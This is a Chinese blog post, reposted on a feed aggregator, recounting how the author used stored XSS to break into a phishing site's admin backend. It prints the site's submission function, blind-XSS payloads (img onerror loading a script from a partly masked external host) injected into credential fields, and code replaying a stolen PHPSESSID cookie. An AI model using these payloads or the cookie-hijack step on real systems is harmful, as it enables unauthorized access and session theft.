惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

S
Security Affairs
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
Jina AI
Jina AI
P
Palo Alto Networks Blog
GbyAI
GbyAI
大猫的无限游戏
大猫的无限游戏
A
Arctic Wolf
Hugging Face - Blog
Hugging Face - Blog
小众软件
小众软件
Y
Y Combinator Blog
T
The Blog of Author Tim Ferriss
Blog — PlanetScale
Blog — PlanetScale
S
Schneier on Security
V
Vulnerabilities – Threatpost
C
Cybersecurity and Infrastructure Security Agency CISA
雷峰网
雷峰网
T
Tenable Blog
人人都是产品经理
人人都是产品经理
T
Tor Project blog
C
Cyber Attacks, Cyber Crime and Cyber Security
AWS News Blog
AWS News Blog
Microsoft Security Blog
Microsoft Security Blog
J
Java Code Geeks
Scott Helme
Scott Helme
SecWiki News
SecWiki News
C
CERT Recently Published Vulnerability Notes
Recorded Future
Recorded Future
I
InfoQ
Security Archives - TechRepublic
Security Archives - TechRepublic
Help Net Security
Help Net Security
Cloudbric
Cloudbric
C
Check Point Blog
Engineering at Meta
Engineering at Meta
TaoSecurity Blog
TaoSecurity Blog
B
Blog
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
博客园_首页
N
News and Events Feed by Topic
云风的 BLOG
云风的 BLOG
MyScale Blog
MyScale Blog
腾讯CDC
量子位
Application and Cybersecurity Blog
Application and Cybersecurity Blog
K
Kaspersky official blog
Vercel News
Vercel News
F
Full Disclosure
T
Troy Hunt's Blog
Forbes - Security
Forbes - Security
S
Security @ Cisco Blogs

阿方的博客

[已下线] 博客分布式电源管理系统已上线 - 阿方的博客 在 MCU 部署边缘 AI —— 以 RA6E2 天气预测为例 嘉立创双十一金豆活动秒杀脚本 - 阿方的博客 GD32VW553-IoT 实现 SoftAP 配网 - 阿方的博客 24MHz 8CH 开源逻辑分析仪指南 - 阿方的博客 从光谱到 RGB - 阿方的博客 MM32:配置开发环境并点亮第一颗 LED - 阿方的博客 DG-LAB APP 郊狼波形导出二维码的解析 - 阿方的博客 新头像!福瑞 OC! - 阿方的博客 【补档】从零开始制作一个矿石作物 Addon - 阿方的博客 关于我 - 阿方的博客
记一次 XSS 攻击非法钓鱼网站 - 阿方的博客
Fang_Zhijian · 2024-10-20 · via 阿方的博客

收到了一封钓鱼邮件,不知道点到了什么就不小心进入了后台...

起因

图1

收到了一封钓鱼邮件,点开看了看,准备玩玩

分析前端

进入钓鱼网站首页是一张图片,点击图片后会跳转到一个新的页面

图2
图3

随便尝试提交一个数据,可以看到是一个名为 ds 的函数发起的 POST 请求

图4

找到这个函数所在的 js,稍稍向下翻可以看到 ds 函数的用例,分别是提交账号、密码和验证码

document.write('<script src="../app/data.php?sv=js&'+Math.random()+'"><\/script>');
function ds(act,data){
    console.log(data);
    $.post('../app/data.php','sv='+encodeURIComponent(b6(b6(JSON.stringify({act:act||'sv',data:data})))),function(d){
        d = dejson(d);
    });    
}

// .......... 省略 ..........

// console.log("ds('sv',{user:'4165456',pass:'446565'});");
// console.log("ds('sv',{code:'4165456'});");


// .......... 省略 ..........

可以直接使用 ds 函数发送包含 XSS 代码的数据

XSS 注入

在控制台执行 ds 函数,插入一条包含 XSS 代码的数据

ds('sv',{user:"<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//xss**.**/wel';>",pass:"<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//xss**.**/wel';>"});

执行成功后页面跳转到输入验证码界面,再执行一次 ds 函数插入验证码

ds('sv',{code:"<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//xss**.**/wel';>"});

接下来等待上钩...

进入后台

图5

在提交数据没几分钟后 XSS 脚本就成功执行,获取到了后台截图、后台地址、Cookie 等信息,

在后台登录页面为自己添加了脚本获取的 Cookie,刷新页面就成功进入了后台

var cookiestr="PHPSESSID=7cf4f5**********590";var arr = cookiestr.split(";");
for(var i in arr){
 document.cookie=arr[i];
}

图6